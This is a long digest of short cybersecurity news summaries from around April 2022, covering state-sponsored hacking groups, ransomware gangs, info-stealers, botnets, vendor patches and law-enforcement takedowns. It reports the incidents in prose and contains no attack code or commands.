    Recorded Future’s Insikt Group continues to monitor Russian state-sponsored cyber espionage operations targeting government and private sector organizations across multiple geographic regions. From mid-2021 onwards, Recorded Future’s midpoint collection revealed a steady rise in the use of NOBELIUM infrastructure tracked by Insikt Group as SOLARDEFLECTION, which encompasses command and control (C2) infrastructure. In this report, we highlight trends observed by Insikt Group while monitoring SOLARDEFLECTION infrastructure and the recurring use of typosquat domains by its operators.

    UNC3524 APT Uses IP Cameras to Deploy Backdoors and Target Exchange

    Mandiant researchers discovered a new APT group, tracked as UNC3524, that heavily targets the emails of employees who focus on corporate development, mergers and acquisitions, and large corporate transactions. Once it had gained initial access to the target systems, UNC3524 deployed a previously unknown backdoor tracked by Mandiant researchers as QUIETEXIT. The QUIETEXIT backdoor borrows code from the open-source Dropbear SSH client-server software. The threat actors deployed QUIETEXIT on network appliances within the target network, including load balancers and wireless access point controllers.

    Chinese "Override Panda" Hackers Resurface With New Espionage Attacks

    A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. "The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week. "The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country."

    Here's a New Tool That Scans Open-Source Repositories for Malicious Packages

    The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories. Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software.

    Russian Hackers Compromise Embassy Emails to Target Governments

    Security analysts have uncovered a recent phishing campaign from Russian hackers known as APT29 (Cozy Bear or Nobelium) targeting diplomats and government entities in Europe, the Americas, and Asia. The APT29 is a state-sponsored actor that focuses on cyberespionage and has been active since at least 2014. Its targeting scope is determined by current Russian geopolitical strategic interests.

    REvil Ransomware Returns: New Malware Sample Confirms Gang is Back

    “The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.” The REvil ransomware group was shut down by law enforcement back in October of 2021. Various members of the group were arrested and their Tor servers were seized. There have been rumors that the group's Tor servers were back online, and this week we are seeing reports that their previous websites are now redirecting visitors to a new unnamed ransomware operation.

    Hackers Fool Major Tech Companies Into Handing Over Data of Women and Minors to Abuse

    Some major tech companies have unwittingly opened harassment and exploitation opportunities to the women and children who they have pledged to protect. This happened because they provided information in response to emergency data requests from legitimate law enforcement accounts that hackers had compromised. This finding came from four federal law enforcement agencies and a couple of industry investigators.

    EmoCheck Now Detects New 64-bit Versions of Emotet Malware

    The Japan CERT has released a new version of their EmoCheck utility to detect new 64-bit versions of the Emotet malware that began infecting users this month. Emotet is one of the most actively distributed malware spread through emails using phishing emails with malicious attachments, including Word/Excel documents, Windows shortcuts, ISO files, and password-protected zip files. The phishing emails use creative lures to trick users into opening the attachments, including reply-chain emails, shipping notices, tax documents, accounting reports, or even holiday party invites.

    FIN7 BadUSB

    The criminal group FIN7 has been mailing malware-ridden USBs to various entities in the transport, insurance, and defense industries under the guise that they originated from a trusted source, such as Amazon and the US Department of Health and Human Services. Those from the former were supposedly gift vouchers, while the latter claimed to include new COVID guidelines. FIN7’s badUSB attacks serve as a reminder of two key vulnerabilities present among all organizations.

    New Black Basta Ransomware Springs Into Action With a Dozen Breaches

    A new ransomware gang known as Black Basta has quickly catapulted into operation this month, breaching at least twelve companies in just a few weeks. The first known Black Basta attacks occurred in the second week of April, as the operation quickly began attacking companies worldwide. While ransom demands likely vary between victims, BleepingComputer is aware of one victim who received over a $2 million demand from the Black Basta gang to decrypt files and not leak data.

    Microsoft: Russia Has Launched Hundreds of Cyberattacks Against Ukraine

    Microsoft warns it saw six Russia-aligned, state-sponsored hacking groups launch over 237 cyberattacks against Ukraine starting in the weeks before Russia's February 24 invasion. Microsoft has released an in-depth report detailing how Russian cyberattacks against Ukraine were "strongly correlated" or "directly timed" with its military operations in the country.

    2021 Top Routinely Exploited Vulnerabilities

    CISA, the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have released a joint Cybersecurity Advisory that provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited. CISA encourages users and administrators to review joint Cybersecurity Advisory: 2021 Top Routinely Exploited Vulnerabilities and apply the recommended mitigations to reduce the risk of compromise by malicious cyber actors.

    Chinese State-Backed Hackers Now Target Russian State Officers

    Security researchers analyzing a phishing campaign targeting Russian officials found evidence that points to the China-based threat actor tracked as Mustang Panda (also known as HoneyMyte and Bronze President). The threat group was previously seen orchestrating intelligence collection campaigns against European targets, employing phishing lures inspired by the Russian invasion of Ukraine.

    Rig Exploit Kit Drops Redline Malware via Internet Explorer Bug

    Threat analysts have uncovered yet another campaign that uses the RIG Exploit Kit to deliver the RedLine stealer malware. Exploit kits (EKs) have dropped drastically in popularity, as they targeted vulnerabilities in web browsers introduced by plug-in software such as the now-defunct Flash Player and Microsoft Silverlight.

    Russian Govt Impersonators Target Telcos in Phishing Attacks

    A previously unknown and financially motivated hacking group is impersonating a Russian agency in a phishing campaign targeting entities in Eastern European countries. The phishing emails pretend to come from the Russian Government’s Federal Bailiffs Service and are written in the Russian language, with the recipients being telecommunication service providers and industrial firms in Lithuania, Estonia, and Russia.

    North Korean Hackers Targeting Journalists With Novel Malware

    North Korean state-sponsored hackers known as APT37 have been discovered targeting journalists specializing in the DPRK with a novel malware strain. The malware is distributed through a phishing attack first discovered by NK News, an American news site dedicated to covering news and providing research and analysis about North Korea, using intelligence from within the country.

    Security Teams Should Be Addressing Quantum Cyber-Threats Now

    Addressing quantum cyber-threats should already be a high priority for cybersecurity professionals, according to Duncan Jones, head of cybersecurity at Quantinuum, speaking during the ISC2 Secure Webinar ‘The Threat and Promise of Quantum Cybersecurity.’ Jones began by emphasizing the significant differences between quantum and classical computing, both in operations and possibilities. One of the most significant of these is that while classical computers only have binary choices, 0 or 1, quantum computers are made up of ‘qubits,’ which “can have values that are combinations of 0 and 1.” This mixture is known as a ‘superposition.’ This enables calculations to be made in parallel. In addition, qubits can be connected, which provides the opportunity to model aspects of nature in their entirety. This aspect offers enormous potential in fields like drug discovery, where testing could be simulated rather than requiring lengthy and expensive trials.

    Quantum Ransomware Seen Deployed in Rapid Network Attacks

    The Quantum ransomware, a strain first discovered in August 2021, was seen carrying out speedy attacks that escalate quickly, leaving defenders little time to react. The threat actors are using the IcedID malware as one of their initial access vectors, which deploys Cobalt Strike for remote access and leads to data theft and encryption using Quantum Locker.

    Crooks Spoofing Credit Unions to Steal Funds and Login Credentials

    Email security provider Avanan revealed in a Thursday report that a new phishing campaign exploits local credit unions to steal money and data. According to Avanan’s research, phishing emails are masqueraded as legit messages from high-profile companies/businesses. They are sent to lure the recipient into sharing login credentials and sensitive data of the spoofed company.

    New Powerful Prynt Stealer Malware Sells for Just $100 per Month

    Threat analysts have spotted yet another addition to the growing space of info-stealer malware infections, named Prynt Stealer, which offers powerful capabilities and extra keylogger and clipper modules. Prynt Stealer targets a large selection of web browsers, messaging apps, and gaming apps and can also perform direct financial compromise.

    French Hospital Group Disconnects Internet After Hackers Steal Data

    The GHT Coeur Grand Est. Hospitals and Health Care group has disconnected all incoming and outgoing Internet connections after discovering they suffered a cyberattack that resulted in the theft of sensitive administrative and patient data. GHT is a hospital network located in Northeast France consisting of nine locations, 6,000 employees, and approximately 3,370 beds.

    Russian Hackers are Seeking Alternative Money-laundering Options

    Due to government sanctions, law enforcement action, and the takedown of popular dark web markets, Russian cybercriminals are looking for alternative means to carry out money-laundering activities. As pressure from law enforcement mounts, cybercriminals will need to be more creative when withdrawing stolen funds and cryptocurrency. “First came the bank sanctions and the blocking of SWIFT payments, a result of the Russian invasion of Ukraine. This crippled the regular channels for cash flows used by cybercriminals. Then came the suspension of Russian operations of direct money transfer services such as Western Union and MoneyGram. Scammers and extortionists typically used those to receive payments from victims without revealing their real identity. On April 5, the servers of Hydra Market, the largest Russian darknet platform, were seized by the German police, taking down a massive business (over $1.35 billion annual turnover) that also sustained money-laundering services. The following day, the U.S. sanctioned Garantex, one of the most important platforms Russian cybercriminals used for laundering stolen funds, which followed a wave of sanctions on similar platforms starting in 2021. Finally, Binance became the first large cryptocurrency exchange to essentially ban Russian users from performing transactions or investments, and more are expected to follow soon. Even coin mining operations of significant size in Russia are being sanctioned.”

    Atlassian Fixes Critical Jira Authentication Bypass Vulnerability

    Atlassian has published a security advisory to alert that its Jira and Jira Service Management products are affected by a critical authentication bypass vulnerability in Seraph, the company's web application security framework. Seraph is used in Jira and Confluence for handling all login and logout requests via a system of pluggable core elements.

    Docker Servers Hacked in Ongoing Cryptomining Malware Campaign

    Docker APIs on Linux servers are being targeted by a large-scale Monero crypto-mining campaign from the operators of the LemonDuck botnet. Docker is a platform for building, running and managing containerized workloads. Docker provides a number of APIs to help developers with automation, and these APIs can be made available using local Linux sockets or daemons.

    TeamTNT targeting AWS, Alibaba

    Cisco Talos has recently received modified versions of the TeamTNT cyber crime group's malicious shell scripts, an earlier version of which was detailed by Trend Micro. The malware author modified the tools after becoming aware that security researchers had published the previous version of the scripts. The scripts are primarily designed to target Amazon Web Services (AWS) but could also run on on-premises, container, or other forms of Linux instances. They have the ability to mine cryptocurrency, maintain persistence, move laterally, provide remote access, and evade defenses. The threat actors used a bash script to collect information on targeted instances; some scripts (GRABBER_aws_cloud.sh) will not execute if specific hostnames are detected on the targeted machine, a check that is performed to avoid installing the malware on the authors' own systems. The script then checks APIs for credentials that can be used to execute additional scripts, approximately 17 in total. Researchers noted that, “TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools.”

    North Korea Funding Nuclear Program with Cyber Activity

    A United Nations expert on North Korea has said the country is funding its banned nuclear and missile programs with cyber activity. Eric Penton-Voak, a coordinator of the UN group tasked with monitoring the enforcement of sanctions on North Korea, made the comment on Wednesday and called for increased focus on cybercrime stemming from the country.

    Critical Bug in Android Could Allow Access to Users’ Media Files

    Security analysts have found that Android devices running on Qualcomm and MediaTek chipsets were vulnerable to remote code execution due to a flaw in the implementation of the Apple Lossless Audio Codec (ALAC). ALAC is an audio coding format for lossless audio compression that Apple open-sourced in 2011. Since then, the company has been releasing updates to the format, including security fixes, but not every third-party vendor using the codec applies these fixes.

    Emotet Botnet Grows in Size and Activity

    Kaspersky experts have detected significant growth in complex malicious spam emails targeting organizations in various countries. These emails are being distributed as part of a coordinated campaign that aims to spread Qbot and Emotet – two notorious banking Trojans that function as part of botnet networks. Both malware instances are capable of stealing users’ data, collecting data on an infected corporate network, spreading further in the network, and installing ransomware or other Trojans on other devices in the network. One of the functions of Qbot is also to access and steal emails.

    FBI: BlackCat Ransomware Breached at Least 60 Entities Worldwide

    The Federal Bureau of Investigation (FBI) says the BlackCat ransomware gang, also known as ALPHV, has breached the networks of at least 60 organizations worldwide between November 2021 and March 2022. The FBI's Cyber Division revealed this in a TLP:WHITE flash alert released on Wednesday in coordination with the Cybersecurity and Infrastructure Security Agency (DHS/CISA).

    Joint CSA: Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure

    We have closely followed the cyber landscape during the Russia and Ukraine conflict. Reporting today suggests that Russia has been using new malware variants in recent attacks in addition to previous DDoS and wiper attacks on Ukrainian infrastructure in previous campaigns. A joint advisory was released a few moments ago from the cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom. It was released to warn organizations that Russia’s invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity from Russian state-sponsored cyber actors or Russian-aligned cybercrime groups.

    Emotet Botnet Switches to 64-bit modules, Increases Activity

    The Emotet malware is having a burst in distribution and is likely to soon switch to new payloads that are currently detected by fewer antivirus engines. Security researchers monitoring the botnet are observing that emails carrying malicious payloads last month have increased tenfold. According to Kaspersky, the number of phishing emails distributed by Emotet operators from February to March increased from 3,000 to 30,000 emails.

    Russian State Hackers Hit Ukraine With New Malware Variants

    Threat analysts report that the Russian state-sponsored threat group known as Gamaredon (a.k.a. Armageddon/Shuckworm) is launching attacks against targets in Ukraine using new variants of the custom Pteredo backdoor. Gamaredon has been launching cyber-espionage campaigns targeting the Ukrainian government and other critical entities since at least 2014. The actor is known for its strong focus on Ukraine, being attributed over 5,000 cyberattacks against 1,500 public and private entities in the country.

    Google Project Zero Detects a Record Number of Zero-Day Exploits in 2021

    Google Project Zero called 2021 a "record year for in-the-wild 0-days," as 58 security vulnerabilities were detected and disclosed during the course of the year. The development marks more than a two-fold jump from the previous maximum when 28 zero-day exploits were tracked in 2015. In contrast, only 25 zero-day exploits were detected in 2020. "The large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits," Google Project Zero security researcher Maddie Stone said.

    Okta: Just Two Customers Impacted by Lapsus Breach

    Okta has revealed that just two of its customers were affected by an incident in January in which threat actors compromised a third-party vendor’s workstation. The authentication specialist completed its investigation into the events that took place between January 16 and 21 this year, when it was believed that a hacker from the Lapsus group gained access to back-end systems. Previously, Okta estimated that 366 customers may have had their tenants accessed by the attackers via a Sitel support engineer’s machine.

    Lenovo Patches UEFI Firmware Vulnerabilities Impacting Millions of Users

    Lenovo has patched a trio of bugs that could be abused to perform UEFI attacks. Discovered by ESET researcher Martin Smolár, the vulnerabilities, assigned as CVE-2021-3970, CVE-2021-3971, and CVE-2021-3972, could be exploited to "deploy and successfully execute UEFI malware either in the form of SPI flash implants like LoJax or ESP implants like ESPecter" in the Lenovo Notebook BIOS.

    Kaspersky Releases a Free Decryptor for Yanluowang Ransomware

    Researchers from Kaspersky discovered a vulnerability in the encryption process of the Yanluowang ransomware that can be exploited to recover the files encrypted by the malware without paying the ransom. The Yanluowang ransomware was first spotted by researchers from Symantec Threat Hunter Team in October 2021 after the malware was used in highly targeted attacks against large enterprises.

    LinkedIn Brand Takes Lead as Most Impersonated In Phishing Attacks

    Security researchers are warning that LinkedIn has become the most spoofed brand in phishing attacks, accounting for more than 52% of all such incidents at a global level. The data comes from cybersecurity company Check Point, which recorded a dramatic uptick in LinkedIn brand abuse in phishing incidents in the first quarter of this year.

    North Korean State-Sponsored APT Targeting Blockchain Companies

    The U.S. government has observed North Korean cyber actors targeting a variety of organizations in the blockchain technology and cryptocurrency industry, including cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs).

    Pegasus Spyware Targeted UK Prime Minister, Say Researchers

    A notorious spyware variant linked to multiple state-backed campaigns was used to target the UK Prime Minister’s Office over the past two years, researchers have revealed. Over recent years, Canadian non-profit Citizen Lab has been heavily involved in tracking the use of the Pegasus spyware produced by Israel’s NSO Group. The firm is being sued by both WhatsApp and Apple after customers of the tech giants were targeted by the covert malware. It was also used to compromise the iPhones of nine US State Department officials, it emerged late last year.

    GitHub: Attacker Breached Dozens of Orgs Using Stolen OAuth Tokens

    GitHub revealed Friday that an attacker is using stolen OAuth user tokens (issued to two third-party integrators, Heroku and Travis-CI) to download data from private repositories. Since this campaign was first spotted on April 12, 2022, the threat actor has already accessed and stolen data from dozens of victim organizations using Heroku and Travis-CI-maintained OAuth apps, including npm.

    Researchers Share In-Depth Analysis of PYSA Ransomware Group

    An 18-month-long analysis of the PYSA ransomware operation has revealed that the cybercrime cartel followed a five-stage software development cycle from August 2020, with the malware authors prioritizing features to improve the efficiency of its workflows. This included a user-friendly tool like a full-text search engine to facilitate the extraction of metadata and enable the threat actors to find and access victim information quickly.

    T-Mobile Customers Warned of Unblockable SMS Phishing Attacks

    An ongoing phishing campaign is targeting T-Mobile customers with malicious links using unblockable texts sent via SMS (Short Message Service) group messages. The New Jersey Cybersecurity & Communications Integration Cell (NJCCIC) issued a warning after multiple customers filed reports of being targeted by this new SMS phishing (smishing) campaign.

    Industrial Spy, a New Stolen Data Market Is Advertised via Adware and Cracks

    Industrial Spy is an online marketplace that sells information stolen from compromised organizations while also "spoiling" its customers with stolen data that's free of charge. Unlike traditional stolen data marketplaces, where data is used to extort enterprises and threaten them with GDPR fines, Industrial Spy promotes itself as a marketplace where organizations can buy their rival companies' data to gain access to trade classified information, manufacturing diagrams, accounting reports, and client databases. This newer and lesser-known marketplace offers different tiers of data offerings, with "premium" stolen data packages costing millions of dollars and lower-tier data that can be bought as individual files for as little as $2. An image sample from Bleeping Computer displays Industrial Spy selling an Indian company's data in their premium category for $1.4 million in Bitcoins.

    New SolarMarker Malware Variant Using Updated Techniques to Stay Under the Radar

    Cybersecurity researchers have disclosed a new version of the SolarMarker malware that packs in new improvements with the goal of updating its defense evasion abilities and staying under the radar. "The recent version demonstrated an evolution from Windows Portable Executables (EXE files) to working with Windows installer package files (MSI files)," Palo Alto Networks Unit 42 researchers said in a report published this month. "This campaign is still in development and going back to using executable files (EXE) as it did in its earlier versions."

    ‘Mute’ Button in Conferencing Apps May Not Actually Mute Your Mic

    A new study shows that pressing the mute button on popular video conferencing apps (VCA) may not actually work like you think it should, with apps still listening in on your microphone. More specifically, in the studied software, pressing mute does not prevent audio from being transmitted to the apps' servers, either continually or periodically.

    Karakurt Revealed as Data Extortion Arm of Conti Cybercrime Syndicate

    After breaching servers managed by the cybercriminals, security researchers found a connection between Conti ransomware and the recently emerged Karakurt data extortion group, showing that the two gangs are part of the same operation. The Conti ransomware syndicate is one of the most prolific cybercriminal groups today that operates unabated despite the massive leak of internal conversations and source code that a hacking group already used to cripple Russian organizations.

    Google Issues Third Emergency Fix for Chrome This Year

    Google is issuing fixes for two vulnerabilities in its Chrome web browser, including one flaw already being exploited in the wild. The emergency updates the company issued this week impacted almost 3 billion users of its Chrome browser and those using other Chromium-based browsers, such as Microsoft Edge, Brave, and Vivaldi.

    New Fodcha DDoS Botnet Targets Over 100 Victims Every Day

    A rapidly growing botnet is ensnaring routers, DVRs, and servers across the Internet to target more than 100 victims every day in distributed denial-of-service (DDoS) attacks. This newly discovered malware, named Fodcha by researchers at Qihoo 360's Network Security Research Lab (360 Netlab), has spread to over 62,000 devices between March 29 and April 10.

    OldGremlin Ransomware Gang Targets Russia With New Malware

    OldGremlin, a little-known threat actor that uses its particularly advanced skills to run carefully prepared, sporadic campaigns, made a comeback last month after a gap of more than one year. The group distinguishes itself from other ransomware operations through the small number of campaigns - fewer than five since early 2021 - that target only businesses in Russia, and through the use of custom backdoors built in-house.

    Hackers Target Ukrainian Govt With IcedID malware, Zimbra Exploits

    Hackers are targeting Ukrainian government agencies with new attacks leveraging Zimbra exploits and with phishing attacks pushing the IcedID malware. The Computer Emergency Response Team of Ukraine (CERT-UA) detected the new campaigns and attributed the IcedID phishing attack to the UAC-0041 threat cluster, previously connected with AgentTesla distribution, and the second to UAC-0097, a currently unknown actor.

    "Haskers Gang" Introduces New ZingoStealer

    A new type of information stealer has been added to the Haskers Gang malware portfolio. On Thursday, researchers from Cisco Talos said that the malware, dubbed ZingoStealer, is being offered for free to Haskers Gang Telegram group members. Active since at least 2020, the Haskers Gang group isn't your typical, small collective of cybercriminals. Instead, the 'community' comprises a few founders -- likely based in Eastern Europe -- and thousands of casual members.

    New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems

    In early 2022, Mandiant, in partnership with Schneider Electric, analyzed a set of novel industrial control system (ICS)-oriented attack tools—which we call INCONTROLLER—built to target machine automation devices. The tools can interact with specific industrial equipment embedded in different types of machinery leveraged across multiple industries. While the targeting of any operational environments using this toolset is unclear, the malware poses a critical risk to organizations leveraging the targeted equipment. INCONTROLLER is very likely state sponsored and contains capabilities related to disruption, sabotage, and potentially physical destruction.

    Remote Procedure Call Runtime Remote Code Execution Vulnerability

    Microsoft Patch Tuesday security updates for April 2022 fixed 128 vulnerabilities in multiple products, including Microsoft Windows and Windows Components, Microsoft Defender and Defender for Endpoint, Microsoft Dynamics, Microsoft Edge (Chromium-based), Exchange Server, Office and Office Components, SharePoint Server, Windows Hyper-V, DNS Server, Skype for Business, .NET and Visual Studio, Windows App Store, and Windows Print Spooler Components.

    Critical Vulnerabilities Uncovered in Hospital Robots

    Vendor Aethon has patched five critical vulnerabilities in hospital robots used to deliver medical supplies. Aethon's mobile robots (referred to as TUG) are autonomous devices used by hundreds of hospitals to perform basic, repetitive tasks to augment existing workforces. TUGs run errands including medicine delivery, cleaning, and dropping off linen and other supplies to healthcare professionals. Stanford is a healthcare provider that uses the robots in drug deliveries, which can move at 2mph down pre-determined routes.

    Critical Flaw in Elementor WordPress Plugin May Affect 500K Sites

    The authors of the Elementor Website Builder plugin for WordPress have released version 3.6.3 to address a critical remote code execution flaw that may impact as many as 500,000 websites. Although exploiting the flaw requires authentication, its critical severity stems from the fact that any user logged into a vulnerable site can exploit it, including regular subscribers.

    Microsoft Disrupts ZLoader Malware in Global Operation

    A months-long global operation led by Microsoft's Digital Crimes Unit (DCU) has taken down dozens of domains used as command-and-control (C2) servers by the notorious ZLoader botnet. The court order obtained by Microsoft allowed it to sinkhole 65 hardcoded domains used by the ZLoader cybercrime gang to control the botnet and another 319 domains generated by the domain generation algorithm (DGA) the malware uses to create fallback and backup communication channels.

    Enemybot: A New Mirai, Gafgyt Hybrid Botnet Joins the Scene

    A new botnet is targeting routers, Internet of Things (IoT) devices, and an array of server architectures. On April 12, cybersecurity researchers from FortiGuard Labs said the new distributed denial-of-service (DDoS) botnet, dubbed Enemybot, borrows modules from the infamous Mirai botnet's source code, alongside Gafgyt's

    Sandworm Hackers Fail to Take Down Ukrainian Energy Provider

    The Russian state-sponsored hacking group known as Sandworm tried on Friday to take down a large Ukrainian energy provider by disconnecting its electrical substations with a new variant of the Industroyer malware for industrial control systems (ICS) and a new version of the CaddyWiper data destruction malware.

    LockBit Ransomware Gang Lurked in a U.S. Gov Network for Months

    A regional U.S. government agency compromised with LockBit ransomware had the threat actor in its network for at least five months before the payload was deployed, security researchers found. Logs retrieved from the compromised machines showed that two threat groups had compromised them and were engaged in reconnaissance and remote access operations.

    United States Leads Seizure of One of the World’s Largest Hacker Forums and Arrests Administrator

    The Department of Justice today announced the seizure of the RaidForums website, a popular marketplace for cybercriminals to buy and sell hacked data, and unsealed criminal charges against RaidForums’ founder and chief administrator, Diogo Santos Coelho, 21, of Portugal. Coelho was arrested in the United Kingdom on Jan. 31, at the United States’ request and remains in custody pending the resolution of his extradition proceedings.

    Only Half of Organizations Reviewed Security Policies Due to the Pandemic: Study

    According to research published on Tuesday by the Ponemon Institute on behalf of Intel, enterprises worldwide will spend roughly $172 billion on cybersecurity this year. However, only 53% of respondents said they refreshed their existing strategies because of the pandemic, which could indicate a disconnect between spending the money and applying it correctly to the modern workplace.

    Conti’s Leaked Ransomware Used to Target Russian Businesses

    A hacker organization known as NB65 has been infiltrating Russian businesses, collecting their data, and then exposing it online, stating that the attacks are being carried out in retaliation for Russia's military intervention in Ukraine. The group claims to have targeted several Russian organizations, including document management company Tensor, the Russian space agency Roscosmos, and the state-owned Russian television and radio broadcaster VGTRK.

    New Android Banking Malware Remotely Takes Control of Your Device

    A new Android banking malware named Octo has appeared in the wild, featuring remote access capabilities that allow malicious operators to perform on-device fraud. Octo is an evolved Android malware based on ExoCompact, itself a variant of the Exo trojan, whose author left the cybercrime scene and whose source code was leaked in 2018.

    New Meta Information Stealer Distributed in Malspam Campaign

    A malspam campaign has been found distributing META, a new info-stealer that appears to be rising in popularity among cybercriminals. META is one of several newer info-stealers, along with Mars Stealer and BlackGuard, whose operators aim to take advantage of Raccoon Stealer's exit from the market, which left many criminals searching for their next platform.

    Snap-on Discloses Data Breach Claimed by Conti Ransomware Gang

    American automotive tools manufacturer Snap-on announced a data breach exposing associate and franchisee data after the Conti ransomware gang began leaking the company's data in March. Snap-on is a leading manufacturer and designer of tools, software, and diagnostic services used by the transportation industry through various brands, including Mitchell1, Norbar, Blue-Point, Blackhawk, and Williams.

    OpenSSH Now Defaults to Protecting Against Quantum Computer Attacks

    Post-quantum cryptography has arrived by default with the release of OpenSSH 9.0 and the adoption of the hybrid Streamlined NTRU Prime + x25519 key exchange method. "The NTRU algorithm is believed to resist attacks enabled by future quantum computers and is paired with the X25519 ECDH key exchange (the previous default) as a backstop against any weaknesses in NTRU Prime that may be discovered in the future. The combination ensures that the hybrid exchange offers at least as good security as the status quo," the release notes said.

    Microsoft Takes Down APT 28 Domains Used in Attacks Against Ukraine

    Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking down seven domains used as attack infrastructure. Strontium (also tracked as Fancy Bear or APT28), linked to Russia's military intelligence service GRU, used these domains to target multiple Ukrainian institutions, including media organizations.

    Malicious Web Redirect Service Infects 16,500 Sites to Push Malware

    A new traffic direction system (TDS) called Parrot runs on compromised servers that host 16,500 websites of universities, local governments, adult content platforms, and personal blogs. Parrot is used in malicious campaigns to redirect potential victims who match a specific profile (location, language, operating system, browser) to online resources such as phishing and malware-dropping sites.

    Finland Government Sites Forced Offline by DDoS Attacks

    The websites of Finland’s defense and foreign affairs ministries were taken offline today following DDoS attacks. The ministries each confirmed the attacks on Twitter earlier today, although the websites now appear to be back up and running. The nation’s Ministry of Defense wrote at 10.45 am GMT: “The Department of Defense’s website is currently under attack. We are currently investigating. We will post any additional information below.” It followed up with: “For the time being, we will keep the Department of Defense website closed until the harmful traffic on the website is gone.”

    FIN7 Hacking Group Member Sentenced to Five Years Behind Bars

    A Ukrainian national has been sentenced as a member of the FIN7 hacking group. On Thursday, the US Department of Justice (DoJ) announced the sentencing of Denys Iarmak to five years in prison for working as a FIN7 penetration tester.

    Employee Info Among 13 Million Records Leaked by Fox News

    A configuration error exposed millions of internal records traced back to Fox News, including personally identifiable information on employees, researchers have claimed. A team at Website Planet led by Jeremiah Fowler claimed that anyone with an internet connection could theoretically have discovered the 58GB trove, which was left open with no password protection.

    VMware Releases Critical Patches for New Vulnerabilities Affecting Multiple Products

    VMware has released security updates to patch eight vulnerabilities spanning its products, some of which could be exploited to launch remote code execution attacks. Tracked from CVE-2022-22954 to CVE-2022-22961 (CVSS scores: 5.3 - 9.8), the issues impact VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Five of the eight bugs are rated Critical, two are rated Important, and one is rated Moderate in severity. Credited with reporting all the vulnerabilities is Steven Seeley of Qihoo 360 Vulnerability Research Institute.

    New FFDroider Malware Steals Facebook, Instagram, Twitter Accounts

    A new information stealer named FFDroider has emerged, stealing credentials and cookies stored in browsers to hijack victims' social media accounts. Social Media accounts, especially verified ones, are an attractive target for hackers as threat actors can use them for various malicious activities, including conducting cryptocurrency scams and distributing malware. These accounts are even more attractive when they have access to the social site's ad platforms, allowing threat actors to use the stolen credentials to run malicious advertisements.

    Impact of the OpenSSL Infinite Loop Vulnerability CVE-2022-0778

    The Palo Alto Networks Product Security Assurance team is evaluating the OpenSSL infinite loop vulnerability (CVE-2022-0778) as it relates to its products. This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial of service (DoS) for the application. An attacker does not need a valid, trusted certificate to exploit this vulnerability, because the infinite loop is triggered while the malformed certificate is being parsed, before signature verification completes.

    Attackers Create Malware for Serverless Computing Platforms Like AWS Lambda

    Security researchers have spotted a new cryptocurrency miner targeting serverless computing platforms like AWS Lambda. While the malware only runs cryptomining software, it shows that threat actors are capable of operating inside complex cloud infrastructure. Cryptomining itself is more of a nuisance than anything, but the technique has implications for more damaging attacks in the future.

    Attack on Ukraine Telecoms Provider Caused by Compromised Employee Credentials

    Russian hackers used compromised employee credentials to launch the cyber-attack that severely disrupted internet services in Ukraine last week, it has been claimed today. Kyrylo Honcharuk, CIO of Ukrtelecom, Ukraine’s national telecommunications provider targeted in the attack on March 28, said Russian actors accessed the account of an employee in a region that was “recently temporarily” occupied, although the exact location was not disclosed.

    US Disrupts Russian Cyclops Blink Botnet Before Being Used in Attacks

    US government officials announced today the disruption of the Cyclops Blink botnet controlled by the Russian-backed Sandworm hacking group before it could be used in attacks. The malware, which Sandworm has used to build this botnet since at least June 2019, targets WatchGuard Firebox firewall appliances and multiple ASUS router models. Cyclops Blink enables the attackers to establish persistence on the device through firmware updates, providing remote access to compromised networks.

    Ransomware: Conti Gang Is Still in Business, Despite Its Own Massive Data Leak

    The Conti ransomware gang is still actively running campaigns against victims around the world, despite the inner workings of the group being revealed by data leaks. One of the most prolific ransomware groups of the last year, Conti has encrypted networks of hospitals, businesses, government agencies and more – in many cases, receiving a significant ransom payment in exchange for the decryption key.

    Block Warns Eight Million Customers of Insider Breach

    A leading US payments company is contacting over eight million current and former customers of its Cash App Investing subsidiary that their details may have been accessed by a malicious insider. San Francisco-headquartered Block revealed the news in an SEC filing on Monday.

    CISA Advises D-Link Users to Take Vulnerable Routers Offline

    CVE-2021-45382 is a remote code execution (RCE) vulnerability that exists in all hardware revisions of the D-Link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers, via the DDNS function in the ncc2 binary. DDNS (Dynamic Domain Name System) is a function that lets systems reach a resource on the Internet whose IP address may change at any time.

    WhatsApp 'Voice Message' Is an Info-Stealing Phishing Attack

